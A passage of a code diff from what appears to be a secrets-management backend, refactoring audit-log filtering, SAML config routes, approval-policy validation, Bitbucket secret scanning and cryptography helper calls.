+              ctx.addIssue({
+                code: z.ZodIssueCode.custom,
+                path: ["endDate"],
+                message: "End date cannot be before start date"
+              });
+            }
+            if (endDate > maxAllowedDate) {
+              ctx.addIssue({
+                code: z.ZodIssueCode.custom,
+                path: ["endDate"],
+                message: "Dates must be within 3 months"
+              });
+            }
+          }
+        }),
      response: {
        200: z.object({
          auditLogs: AuditLogsSchema.omit({
@ -161,7 +184,7 @@ export const registerProjectRouter = async (server: FastifyZodProvider) => {
        filter: {
          ...req.query,
          projectId: req.params.workspaceId,
-          endDate: req.query.endDate,
+          endDate: req.query.endDate || new Date().toISOString(),
          startDate: req.query.startDate || getLastMidnightDateISO(),
          auditLogActorId: req.query.actor,
          eventType: req.query.eventType ? [req.query.eventType] : undefined
--- a/backend/src/ee/routes/v1/saml-router.ts
+++ b/backend/src/ee/routes/v1/saml-router.ts
@ -13,6 +13,7 @@ import { FastifyRequest } from "fastify";
 import { z } from "zod";

 import { SamlProviders, TGetSamlCfgDTO } from "@app/ee/services/saml-config/saml-config-types";
+import { ApiDocsTags, SamlSso } from "@app/lib/api-docs";
 import { getConfig } from "@app/lib/config/env";
 import { BadRequestError } from "@app/lib/errors";
 import { logger } from "@app/lib/logger";
@ -149,8 +150,8 @@ export const registerSamlRouter = async (server: FastifyZodProvider) => {
            firstName,
            lastName: lastName as string,
            relayState: (req.body as { RelayState?: string }).RelayState,
-            authProvider: (req as unknown as FastifyRequest).ssoConfig?.authProvider as string,
-            orgId: (req as unknown as FastifyRequest).ssoConfig?.orgId as string,
+            authProvider: (req as unknown as FastifyRequest).ssoConfig?.authProvider,
+            orgId: (req as unknown as FastifyRequest).ssoConfig?.orgId,
            metadata: userMetadata
          });
          cb(null, { isUserCompleted, providerAuthToken });
@ -262,25 +263,31 @@ export const registerSamlRouter = async (server: FastifyZodProvider) => {
    config: {
      rateLimit: readLimit
    },
-    onRequest: verifyAuth([AuthMode.JWT]),
+    onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]),
    schema: {
+      hide: false,
+      tags: [ApiDocsTags.SamlSso],
+      description: "Get SAML config",
+      security: [
+        {
+          bearerAuth: []
+        }
+      ],
      querystring: z.object({
-        organizationId: z.string().trim()
+        organizationId: z.string().trim().describe(SamlSso.GET_CONFIG.organizationId)
      }),
      response: {
-        200: z
-          .object({
-            id: z.string(),
-            organization: z.string(),
-            orgId: z.string(),
-            authProvider: z.string(),
-            isActive: z.boolean(),
-            entryPoint: z.string(),
-            issuer: z.string(),
-            cert: z.string(),
-            lastUsed: z.date().nullable().optional()
-          })
-          .optional()
+        200: z.object({
+          id: z.string(),
+          organization: z.string(),
+          orgId: z.string(),
+          authProvider: z.string(),
+          isActive: z.boolean(),
+          entryPoint: z.string(),
+          issuer: z.string(),
+          cert: z.string(),
+          lastUsed: z.date().nullable().optional()
+        })
      }
    },
    handler: async (req) => {
@ -302,15 +309,23 @@ export const registerSamlRouter = async (server: FastifyZodProvider) => {
    config: {
      rateLimit: writeLimit
    },
-    onRequest: verifyAuth([AuthMode.JWT]),
+    onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]),
    schema: {
+      hide: false,
+      tags: [ApiDocsTags.SamlSso],
+      description: "Create SAML config",
+      security: [
+        {
+          bearerAuth: []
+        }
+      ],
      body: z.object({
-        organizationId: z.string(),
-        authProvider: z.nativeEnum(SamlProviders),
-        isActive: z.boolean(),
-        entryPoint: z.string(),
-        issuer: z.string(),
-        cert: z.string()
+        organizationId: z.string().trim().describe(SamlSso.CREATE_CONFIG.organizationId),
+        authProvider: z.nativeEnum(SamlProviders).describe(SamlSso.CREATE_CONFIG.authProvider),
+        isActive: z.boolean().describe(SamlSso.CREATE_CONFIG.isActive),
+        entryPoint: z.string().trim().describe(SamlSso.CREATE_CONFIG.entryPoint),
+        issuer: z.string().trim().describe(SamlSso.CREATE_CONFIG.issuer),
+        cert: z.string().trim().describe(SamlSso.CREATE_CONFIG.cert)
      }),
      response: {
        200: SanitizedSamlConfigSchema
@ -341,18 +356,26 @@ export const registerSamlRouter = async (server: FastifyZodProvider) => {
    config: {
      rateLimit: writeLimit
    },
-    onRequest: verifyAuth([AuthMode.JWT]),
+    onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]),
    schema: {
+      hide: false,
+      tags: [ApiDocsTags.SamlSso],
+      description: "Update SAML config",
+      security: [
+        {
+          bearerAuth: []
+        }
+      ],
      body: z
        .object({
-          authProvider: z.nativeEnum(SamlProviders),
-          isActive: z.boolean(),
-          entryPoint: z.string(),
-          issuer: z.string(),
-          cert: z.string()
+          authProvider: z.nativeEnum(SamlProviders).describe(SamlSso.UPDATE_CONFIG.authProvider),
+          isActive: z.boolean().describe(SamlSso.UPDATE_CONFIG.isActive),
+          entryPoint: z.string().trim().describe(SamlSso.UPDATE_CONFIG.entryPoint),
+          issuer: z.string().trim().describe(SamlSso.UPDATE_CONFIG.issuer),
+          cert: z.string().trim().describe(SamlSso.UPDATE_CONFIG.cert)
        })
        .partial()
-        .merge(z.object({ organizationId: z.string() })),
+        .merge(z.object({ organizationId: z.string().trim().describe(SamlSso.UPDATE_CONFIG.organizationId) })),
      response: {
        200: SanitizedSamlConfigSchema
      }
--- a/backend/src/ee/routes/v1/secret-approval-policy-router.ts
+++ b/backend/src/ee/routes/v1/secret-approval-policy-router.ts
@ -23,10 +23,8 @@ export const registerSecretApprovalPolicyRouter = async (server: FastifyZodProvi
        environment: z.string(),
        secretPath: z
          .string()
-          .optional()
-          .nullable()
-          .default("/")
-          .transform((val) => (val ? removeTrailingSlash(val) : val)),
+          .min(1, { message: "Secret path cannot be empty" })
+          .transform((val) => removeTrailingSlash(val)),
        approvers: z
          .discriminatedUnion("type", [
            z.object({ type: z.literal(ApproverType.Group), id: z.string() }),
@ -100,10 +98,10 @@ export const registerSecretApprovalPolicyRouter = async (server: FastifyZodProvi
        approvals: z.number().min(1).default(1),
        secretPath: z
          .string()
+          .trim()
+          .min(1, { message: "Secret path cannot be empty" })
          .optional()
-          .nullable()
-          .transform((val) => (val ? removeTrailingSlash(val) : val))
-          .transform((val) => (val === "" ? "/" : val)),
+          .transform((val) => (val ? removeTrailingSlash(val) : undefined)),
        enforcementLevel: z.nativeEnum(EnforcementLevel).optional(),
        allowedSelfApprovals: z.boolean().default(true)
      }),
--- a/backend/src/ee/routes/v1/secret-approval-request-router.ts
+++ b/backend/src/ee/routes/v1/secret-approval-request-router.ts
@ -58,7 +58,7 @@ export const registerSecretApprovalRequestRouter = async (server: FastifyZodProv
              deletedAt: z.date().nullish(),
              allowedSelfApprovals: z.boolean()
            }),
-            committerUser: approvalRequestUser,
+            committerUser: approvalRequestUser.nullish(),
            commits: z.object({ op: z.string(), secretId: z.string().nullable().optional() }).array(),
            environment: z.string(),
            reviewers: z.object({ userId: z.string(), status: z.string() }).array(),
@ -141,14 +141,39 @@ export const registerSecretApprovalRequestRouter = async (server: FastifyZodProv
    },
    onRequest: verifyAuth([AuthMode.JWT]),
    handler: async (req) => {
-      const { approval } = await server.services.secretApprovalRequest.mergeSecretApprovalRequest({
-        actorId: req.permission.id,
-        actor: req.permission.type,
-        actorAuthMethod: req.permission.authMethod,
-        actorOrgId: req.permission.orgId,
-        approvalId: req.params.id,
-        bypassReason: req.body.bypassReason
+      const { approval, projectId, secretMutationEvents } =
+        await server.services.secretApprovalRequest.mergeSecretApprovalRequest({
+          actorId: req.permission.id,
+          actor: req.permission.type,
+          actorAuthMethod: req.permission.authMethod,
+          actorOrgId: req.permission.orgId,
+          approvalId: req.params.id,
+          bypassReason: req.body.bypassReason
+        });
+
+      await server.services.auditLog.createAuditLog({
+        ...req.auditLogInfo,
+        orgId: req.permission.orgId,
+        projectId,
+        event: {
+          type: EventType.SECRET_APPROVAL_MERGED,
+          metadata: {
+            mergedBy: req.permission.id,
+            secretApprovalRequestSlug: approval.slug,
+            secretApprovalRequestId: approval.id
+          }
+        }
      });
+
+      for await (const event of secretMutationEvents) {
+        await server.services.auditLog.createAuditLog({
+          ...req.auditLogInfo,
+          orgId: req.permission.orgId,
+          projectId,
+          event
+        });
+      }
+
      return { approval };
    }
  });
@ -283,7 +308,7 @@ export const registerSecretApprovalRequestRouter = async (server: FastifyZodProv
              }),
              environment: z.string(),
              statusChangedByUser: approvalRequestUser.optional(),
-              committerUser: approvalRequestUser,
+              committerUser: approvalRequestUser.nullish(),
              reviewers: approvalRequestUser.extend({ status: z.string(), comment: z.string().optional() }).array(),
              secretPath: z.string(),
              commits: secretRawSchema
--- a/backend/src/ee/routes/v2/secret-scanning-v2-routers/bitbucket-secret-scanning-router.ts
+++ b/backend/src/ee/routes/v2/secret-scanning-v2-routers/bitbucket-secret-scanning-router.ts
@ -0,0 +1,16 @@
+import { registerSecretScanningEndpoints } from "@app/ee/routes/v2/secret-scanning-v2-routers/secret-scanning-v2-endpoints";
+import {
+  BitbucketDataSourceSchema,
+  CreateBitbucketDataSourceSchema,
+  UpdateBitbucketDataSourceSchema
+} from "@app/ee/services/secret-scanning-v2/bitbucket";
+import { SecretScanningDataSource } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
+
+export const registerBitbucketSecretScanningRouter = async (server: FastifyZodProvider) =>
+  registerSecretScanningEndpoints({
+    type: SecretScanningDataSource.Bitbucket,
+    server,
+    responseSchema: BitbucketDataSourceSchema,
+    createSchema: CreateBitbucketDataSourceSchema,
+    updateSchema: UpdateBitbucketDataSourceSchema
+  });
--- a/backend/src/ee/routes/v2/secret-scanning-v2-routers/index.ts
+++ b/backend/src/ee/routes/v2/secret-scanning-v2-routers/index.ts
@ -1,5 +1,6 @@
 import { SecretScanningDataSource } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";

+import { registerBitbucketSecretScanningRouter } from "./bitbucket-secret-scanning-router";
 import { registerGitHubSecretScanningRouter } from "./github-secret-scanning-router";

 export * from "./secret-scanning-v2-router";
@ -8,5 +9,6 @@ export const SECRET_SCANNING_REGISTER_ROUTER_MAP: Record<
  SecretScanningDataSource,
  (server: FastifyZodProvider) => Promise<void>
 > = {
-  [SecretScanningDataSource.GitHub]: registerGitHubSecretScanningRouter
+  [SecretScanningDataSource.GitHub]: registerGitHubSecretScanningRouter,
+  [SecretScanningDataSource.Bitbucket]: registerBitbucketSecretScanningRouter
 };
--- a/backend/src/ee/routes/v2/secret-scanning-v2-routers/secret-scanning-v2-router.ts
+++ b/backend/src/ee/routes/v2/secret-scanning-v2-routers/secret-scanning-v2-router.ts
@ -2,6 +2,7 @@ import { z } from "zod";

 import { SecretScanningConfigsSchema } from "@app/db/schemas";
 import { EventType } from "@app/ee/services/audit-log/audit-log-types";
+import { BitbucketDataSourceListItemSchema } from "@app/ee/services/secret-scanning-v2/bitbucket";
 import { GitHubDataSourceListItemSchema } from "@app/ee/services/secret-scanning-v2/github";
 import {
  SecretScanningFindingStatus,
@ -21,7 +22,10 @@ import { readLimit, writeLimit } from "@app/server/config/rateLimiter";
 import { verifyAuth } from "@app/server/plugins/auth/verify-auth";
 import { AuthMode } from "@app/services/auth/auth-type";

-const SecretScanningDataSourceOptionsSchema = z.discriminatedUnion("type", [GitHubDataSourceListItemSchema]);
+const SecretScanningDataSourceOptionsSchema = z.discriminatedUnion("type", [
+  GitHubDataSourceListItemSchema,
+  BitbucketDataSourceListItemSchema
+]);

 export const registerSecretScanningV2Router = async (server: FastifyZodProvider) => {
  server.route({
--- a/backend/src/ee/services/access-approval-policy/access-approval-policy-dal.ts
+++ b/backend/src/ee/services/access-approval-policy/access-approval-policy-dal.ts
@ -53,7 +53,7 @@ export interface TAccessApprovalPolicyDALFactory
      envId: string;
      enforcementLevel: string;
      allowedSelfApprovals: boolean;
-      secretPath?: string | null | undefined;
+      secretPath: string;
      deletedAt?: Date | null | undefined;
      environment: {
        id: string;
@ -93,7 +93,7 @@ export interface TAccessApprovalPolicyDALFactory
        envId: string;
        enforcementLevel: string;
        allowedSelfApprovals: boolean;
-        secretPath?: string | null | undefined;
+        secretPath: string;
        deletedAt?: Date | null | undefined;
        environment: {
          id: string;
@ -116,7 +116,7 @@ export interface TAccessApprovalPolicyDALFactory
    envId: string;
    enforcementLevel: string;
    allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
    deletedAt?: Date | null | undefined;
  }>;
  findLastValidPolicy: (
@ -138,7 +138,7 @@ export interface TAccessApprovalPolicyDALFactory
        envId: string;
        enforcementLevel: string;
        allowedSelfApprovals: boolean;
-        secretPath?: string | null | undefined;
+        secretPath: string;
        deletedAt?: Date | null | undefined;
      }
    | undefined
@ -190,7 +190,7 @@ export interface TAccessApprovalPolicyServiceFactory {
    envId: string;
    enforcementLevel: string;
    allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
    deletedAt?: Date | null | undefined;
  }>;
  deleteAccessApprovalPolicy: ({
@ -214,7 +214,7 @@ export interface TAccessApprovalPolicyServiceFactory {
    envId: string;
    enforcementLevel: string;
    allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
    deletedAt?: Date | null | undefined;
    environment: {
      id: string;
@ -252,7 +252,7 @@ export interface TAccessApprovalPolicyServiceFactory {
    envId: string;
    enforcementLevel: string;
    allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
    deletedAt?: Date | null | undefined;
  }>;
  getAccessApprovalPolicyByProjectSlug: ({
@ -286,7 +286,7 @@ export interface TAccessApprovalPolicyServiceFactory {
      envId: string;
      enforcementLevel: string;
      allowedSelfApprovals: boolean;
-      secretPath?: string | null | undefined;
+      secretPath: string;
      deletedAt?: Date | null | undefined;
      environment: {
        id: string;
@ -337,7 +337,7 @@ export interface TAccessApprovalPolicyServiceFactory {
    envId: string;
    enforcementLevel: string;
    allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
    deletedAt?: Date | null | undefined;
    environment: {
      id: string;
--- a/backend/src/ee/services/access-approval-policy/access-approval-policy-service.ts
+++ b/backend/src/ee/services/access-approval-policy/access-approval-policy-service.ts
@ -60,6 +60,26 @@ export const accessApprovalPolicyServiceFactory = ({
  accessApprovalRequestReviewerDAL,
  orgMembershipDAL
 }: TAccessApprovalPolicyServiceFactoryDep): TAccessApprovalPolicyServiceFactory => {
+  const $policyExists = async ({
+    envId,
+    secretPath,
+    policyId
+  }: {
+    envId: string;
+    secretPath: string;
+    policyId?: string;
+  }) => {
+    const policy = await accessApprovalPolicyDAL
+      .findOne({
+        envId,
+        secretPath,
+        deletedAt: null
+      })
+      .catch(() => null);
+
+    return policyId ? policy && policy.id !== policyId : Boolean(policy);
+  };
+
  const createAccessApprovalPolicy: TAccessApprovalPolicyServiceFactory["createAccessApprovalPolicy"] = async ({
    name,
    actor,
@ -106,6 +126,12 @@ export const accessApprovalPolicyServiceFactory = ({
    const env = await projectEnvDAL.findOne({ slug: environment, projectId: project.id });
    if (!env) throw new NotFoundError({ message: `Environment with slug '${environment}' not found` });

+    if (await $policyExists({ envId: env.id, secretPath })) {
+      throw new BadRequestError({
+        message: `A policy for secret path '${secretPath}' already exists in environment '${environment}'`
+      });
+    }
+
    let approverUserIds = userApprovers;
    if (userApproverNames.length) {
      const approverUsersInDB = await userDAL.find({
@ -279,7 +305,11 @@ export const accessApprovalPolicyServiceFactory = ({
    ) as { username: string; sequence?: number }[];

    const accessApprovalPolicy = await accessApprovalPolicyDAL.findById(policyId);
-    if (!accessApprovalPolicy) throw new BadRequestError({ message: "Approval policy not found" });
+    if (!accessApprovalPolicy) {
+      throw new NotFoundError({
+        message: `Access approval policy with ID '${policyId}' not found`
+      });
+    }

    const currentApprovals = approvals || accessApprovalPolicy.approvals;
    if (
@ -290,9 +320,18 @@ export const accessApprovalPolicyServiceFactory = ({
      throw new BadRequestError({ message: "Approvals cannot be greater than approvers" });
    }

-    if (!accessApprovalPolicy) {
-      throw new NotFoundError({ message: `Secret approval policy with ID '${policyId}' not found` });
+    if (
+      await $policyExists({
+        envId: accessApprovalPolicy.envId,
+        secretPath: secretPath || accessApprovalPolicy.secretPath,
+        policyId: accessApprovalPolicy.id
+      })
+    ) {
+      throw new BadRequestError({
+        message: `A policy for secret path '${secretPath}' already exists in environment '${accessApprovalPolicy.environment.slug}'`
+      });
    }
+
    const { permission } = await permissionService.getProjectPermission({
      actor,
      actorId,
--- a/backend/src/ee/services/access-approval-policy/access-approval-policy-types.ts
+++ b/backend/src/ee/services/access-approval-policy/access-approval-policy-types.ts
@ -122,7 +122,7 @@ export interface TAccessApprovalPolicyServiceFactory {
    envId: string;
    enforcementLevel: string;
    allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
    deletedAt?: Date | null | undefined;
  }>;
  deleteAccessApprovalPolicy: ({
@ -146,7 +146,7 @@ export interface TAccessApprovalPolicyServiceFactory {
    envId: string;
    enforcementLevel: string;
    allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
    deletedAt?: Date | null | undefined;
    environment: {
      id: string;
@ -218,7 +218,7 @@ export interface TAccessApprovalPolicyServiceFactory {
      envId: string;
      enforcementLevel: string;
      allowedSelfApprovals: boolean;
-      secretPath?: string | null | undefined;
+      secretPath: string;
      deletedAt?: Date | null | undefined;
      environment: {
        id: string;
@ -269,7 +269,7 @@ export interface TAccessApprovalPolicyServiceFactory {
    envId: string;
    enforcementLevel: string;
    allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
    deletedAt?: Date | null | undefined;
    environment: {
      id: string;
--- a/backend/src/ee/services/access-approval-request/access-approval-request-service.ts
+++ b/backend/src/ee/services/access-approval-request/access-approval-request-service.ts
@ -354,11 +354,17 @@ export const accessApprovalRequestServiceFactory = ({
      status === ApprovalStatus.APPROVED;

    const isApprover = policy.approvers.find((approver) => approver.userId === actorId);
-    // If user is (not an approver OR cant self approve) AND can't bypass policy
-    if ((!isApprover || (!policy.allowedSelfApprovals && isSelfApproval)) && cannotBypassUnderSoftEnforcement) {
-      throw new BadRequestError({
-        message: "Failed to review access approval request. Users are not authorized to review their own request."
-      });
+
+    const isSelfRejection = isSelfApproval && status === ApprovalStatus.REJECTED;
+
+    // users can always reject (cancel) their own requests
+    if (!isSelfRejection) {
+      // If user is (not an approver OR cant self approve) AND can't bypass policy
+      if ((!isApprover || (!policy.allowedSelfApprovals && isSelfApproval)) && cannotBypassUnderSoftEnforcement) {
+        throw new BadRequestError({
+          message: "Failed to review access approval request. Users are not authorized to review their own request."
+        });
+      }
    }

    if (
@ -414,7 +420,7 @@ export const accessApprovalRequestServiceFactory = ({
      );

      // Only throw if actor is not the approver and not bypassing
-      if (!isApproverOfTheSequence && !isBreakGlassApprovalAttempt) {
+      if (!isApproverOfTheSequence && !isBreakGlassApprovalAttempt && !isSelfRejection) {
        throw new BadRequestError({ message: "You are not a reviewer in this step" });
      }
    }
--- a/backend/src/ee/services/assume-privilege/assume-privilege-service.ts
+++ b/backend/src/ee/services/assume-privilege/assume-privilege-service.ts
@ -1,7 +1,7 @@
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";

 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { ActorType } from "@app/services/auth/auth-type";
 import { TProjectDALFactory } from "@app/services/project/project-dal";
@ -62,7 +62,7 @@ export const assumePrivilegeServiceFactory = ({
    });

    const appCfg = getConfig();
-    const assumePrivilegesToken = jwt.sign(
+    const assumePrivilegesToken = crypto.jwt().sign(
      {
        tokenVersionId,
        actorType: targetActorType,
@ -82,7 +82,7 @@ export const assumePrivilegeServiceFactory = ({
    tokenVersionId
  ) => {
    const appCfg = getConfig();
-    const decodedToken = jwt.verify(token, appCfg.AUTH_SECRET) as {
+    const decodedToken = crypto.jwt().verify(token, appCfg.AUTH_SECRET) as {
      tokenVersionId: string;
      projectId: string;
      requesterId: string;
--- a/backend/src/ee/services/audit-log-stream/audit-log-stream-service.ts
+++ b/backend/src/ee/services/audit-log-stream/audit-log-stream-service.ts
@ -4,7 +4,7 @@ import { RawAxiosRequestHeaders } from "axios";
 import { SecretKeyEncoding } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { request } from "@app/lib/config/request";
-import { infisicalSymmetricDecrypt, infisicalSymmetricEncypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors";
 import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator";

@ -86,7 +86,10 @@ export const auditLogStreamServiceFactory = ({
      .catch((err) => {
        throw new BadRequestError({ message: `Failed to connect with upstream source: ${(err as Error)?.message}` });
      });
-    const encryptedHeaders = headers ? infisicalSymmetricEncypt(JSON.stringify(headers)) : undefined;
+
+    const encryptedHeaders = headers
+      ? crypto.encryption().symmetric().encryptWithRootEncryptionKey(JSON.stringify(headers))
+      : undefined;
    const logStream = await auditLogStreamDAL.create({
      orgId: actorOrgId,
      url,
@ -152,7 +155,9 @@ export const auditLogStreamServiceFactory = ({
        throw new Error(`Failed to connect with the source ${(err as Error)?.message}`);
      });

-    const encryptedHeaders = headers ? infisicalSymmetricEncypt(JSON.stringify(headers)) : undefined;
+    const encryptedHeaders = headers
+      ? crypto.encryption().symmetric().encryptWithRootEncryptionKey(JSON.stringify(headers))
+      : undefined;
    const updatedLogStream = await auditLogStreamDAL.updateById(id, {
      url,
      ...(encryptedHeaders
@ -205,12 +210,15 @@ export const auditLogStreamServiceFactory = ({
    const headers =
      logStream?.encryptedHeadersCiphertext && logStream?.encryptedHeadersIV && logStream?.encryptedHeadersTag
        ? (JSON.parse(
-            infisicalSymmetricDecrypt({
-              tag: logStream.encryptedHeadersTag,
-              iv: logStream.encryptedHeadersIV,
-              ciphertext: logStream.encryptedHeadersCiphertext,
-              keyEncoding: logStream.encryptedHeadersKeyEncoding as SecretKeyEncoding
-            })
+            crypto
+              .encryption()
+              .symmetric()
+              .decryptWithRootEncryptionKey({
+                tag: logStream.encryptedHeadersTag,
+                iv: logStream.encryptedHeadersIV,
+                ciphertext: logStream.encryptedHeadersCiphertext,
+                keyEncoding: logStream.encryptedHeadersKeyEncoding as SecretKeyEncoding
+              })
          ) as LogStreamHeaders[])
        : undefined;

--- a/backend/src/ee/services/audit-log/audit-log-dal.ts
+++ b/backend/src/ee/services/audit-log/audit-log-dal.ts
@ -30,10 +30,10 @@ type TFindQuery = {
  actor?: string;
  projectId?: string;
  environment?: string;
-  orgId?: string;
+  orgId: string;
  eventType?: string;
-  startDate?: string;
-  endDate?: string;
+  startDate: string;
+  endDate: string;
  userAgentType?: string;
  limit?: number;
  offset?: number;
@ -61,18 +61,15 @@ export const auditLogDALFactory = (db: TDbClient) => {
    },
    tx
  ) => {
-    if (!orgId && !projectId) {
-      throw new Error("Either orgId or projectId must be provided");
-    }
-
    try {
      // Find statements
      const sqlQuery = (tx || db.replicaNode())(TableName.AuditLog)
+        .where(`${TableName.AuditLog}.orgId`, orgId)
+        .whereRaw(`"${TableName.AuditLog}"."createdAt" >= ?::timestamptz`, [startDate])
+        .andWhereRaw(`"${TableName.AuditLog}"."createdAt" < ?::timestamptz`, [endDate])
        // eslint-disable-next-line func-names
        .where(function () {
-          if (orgId) {
-            void this.where(`${TableName.AuditLog}.orgId`, orgId);
-          } else if (projectId) {
+          if (projectId) {
            void this.where(`${TableName.AuditLog}.projectId`, projectId);
          }
        });
@ -135,14 +132,6 @@ export const auditLogDALFactory = (db: TDbClient) => {
        void sqlQuery.whereIn("eventType", eventType);
      }

-      // Filter by date range
-      if (startDate) {
-        void sqlQuery.whereRaw(`"${TableName.AuditLog}"."createdAt" >= ?::timestamptz`, [startDate]);
-      }
-      if (endDate) {
-        void sqlQuery.whereRaw(`"${TableName.AuditLog}"."createdAt" <= ?::timestamptz`, [endDate]);
-      }
-
      // we timeout long running queries to prevent DB resource issues (2 minutes)
      const docs = await sqlQuery.timeout(1000 * 120);

@ -174,6 +163,8 @@ export const auditLogDALFactory = (db: TDbClient) => {
      try {
        const findExpiredLogSubQuery = (tx || db)(TableName.AuditLog)
          .where("expiresAt", "<", today)
+          .where("createdAt", "<", today) // to use audit log partition
+          .orderBy(`${TableName.AuditLog}.createdAt`, "desc")
          .select("id")
          .limit(AUDIT_LOG_PRUNE_BATCH_SIZE);

--- a/backend/src/ee/services/audit-log/audit-log-queue.ts
+++ b/backend/src/ee/services/audit-log/audit-log-queue.ts
@ -3,7 +3,7 @@ import { AxiosError, RawAxiosRequestHeaders } from "axios";
 import { SecretKeyEncoding } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { request } from "@app/lib/config/request";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { logger } from "@app/lib/logger";
 import { QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue";
 import { TProjectDALFactory } from "@app/services/project/project-dal";
@ -114,12 +114,15 @@ export const auditLogQueueServiceFactory = async ({
              const streamHeaders =
                encryptedHeadersIV && encryptedHeadersCiphertext && encryptedHeadersTag
                  ? (JSON.parse(
-                      infisicalSymmetricDecrypt({
-                        keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
-                        iv: encryptedHeadersIV,
-                        tag: encryptedHeadersTag,
-                        ciphertext: encryptedHeadersCiphertext
-                      })
+                      crypto
+                        .encryption()
+                        .symmetric()
+                        .decryptWithRootEncryptionKey({
+                          keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
+                          iv: encryptedHeadersIV,
+                          tag: encryptedHeadersTag,
+                          ciphertext: encryptedHeadersCiphertext
+                        })
                    ) as LogStreamHeaders[])
                  : [];

@ -216,12 +219,15 @@ export const auditLogQueueServiceFactory = async ({
          const streamHeaders =
            encryptedHeadersIV && encryptedHeadersCiphertext && encryptedHeadersTag
              ? (JSON.parse(
-                  infisicalSymmetricDecrypt({
-                    keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
-                    iv: encryptedHeadersIV,
-                    tag: encryptedHeadersTag,
-                    ciphertext: encryptedHeadersCiphertext
-                  })
+                  crypto
+                    .encryption()
+                    .symmetric()
+                    .decryptWithRootEncryptionKey({
+                      keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
+                      iv: encryptedHeadersIV,
+                      tag: encryptedHeadersTag,
+                      ciphertext: encryptedHeadersCiphertext
+                    })
                ) as LogStreamHeaders[])
              : [];

--- a/backend/src/ee/services/audit-log/audit-log-service.ts
+++ b/backend/src/ee/services/audit-log/audit-log-service.ts
@ -67,7 +67,8 @@ export const auditLogServiceFactory = ({
      secretPath: filter.secretPath,
      secretKey: filter.secretKey,
      environment: filter.environment,
-      ...(filter.projectId ? { projectId: filter.projectId } : { orgId: actorOrgId })
+      orgId: actorOrgId,
+      ...(filter.projectId ? { projectId: filter.projectId } : {})
    });

    return auditLogs.map(({ eventType: logEventType, actor: eActor, actorMetadata, eventMetadata, ...el }) => ({
--- a/backend/src/ee/services/audit-log/audit-log-types.ts
+++ b/backend/src/ee/services/audit-log/audit-log-types.ts
@ -56,8 +56,8 @@ export type TListProjectAuditLogDTO = {
    eventType?: EventType[];
    offset?: number;
    limit: number;
-    endDate?: string;
-    startDate?: string;
+    endDate: string;
+    startDate: string;
    projectId?: string;
    environment?: string;
    auditLogActorId?: string;
@ -116,6 +116,15 @@ interface BaseAuthData {
  userAgentType?: UserAgentType;
 }

+export enum SecretApprovalEvent {
+  Create = "create",
+  Update = "update",
+  Delete = "delete",
+  CreateMany = "create-many",
+  UpdateMany = "update-many",
+  DeleteMany = "delete-many"
+}
+
 export enum UserAgentType {
  WEB = "web",
  CLI = "cli",
@ -1702,9 +1711,20 @@ interface SecretApprovalReopened {
 interface SecretApprovalRequest {
  type: EventType.SECRET_APPROVAL_REQUEST;
  metadata: {
-    committedBy: string;
+    committedBy?: string | null;
    secretApprovalRequestSlug: string;
    secretApprovalRequestId: string;
+    eventType: SecretApprovalEvent;
+    secretKey?: string;
+    secretId?: string;
+    secrets?: {
+      secretKey?: string;
+      secretId?: string;
+      environment?: string;
+      secretPath?: string;
+    }[];
+    environment: string;
+    secretPath: string;
  };
 }

--- a/backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts
+++ b/backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts
@ -6,6 +6,7 @@ import {
  ProjectPermissionDynamicSecretActions,
  ProjectPermissionSub
 } from "@app/ee/services/permission/project-permission";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { OrderByDirection } from "@app/lib/types";
 import { TKmsServiceFactory } from "@app/services/kms/kms-service";
@ -92,6 +93,12 @@ export const dynamicSecretServiceFactory = ({
      });
    }

+    if (provider.type === DynamicSecretProviders.MongoAtlas && crypto.isFipsModeEnabled()) {
+      throw new BadRequestError({
+        message: "MongoDB Atlas dynamic secret is not supported in FIPS mode of operation"
+      });
+    }
+
    const folder = await folderDAL.findBySecretPath(projectId, environmentSlug, path);
    if (!folder) {
      throw new NotFoundError({ message: `Folder with path '${path}' in environment '${environmentSlug}' not found` });
--- a/backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts
+++ b/backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts
@ -12,6 +12,8 @@ import handlebars from "handlebars";
 import { customAlphabet } from "nanoid";
 import { z } from "zod";

+import { CustomAWSHasher } from "@app/lib/aws/hashing";
+import { crypto } from "@app/lib/crypto";
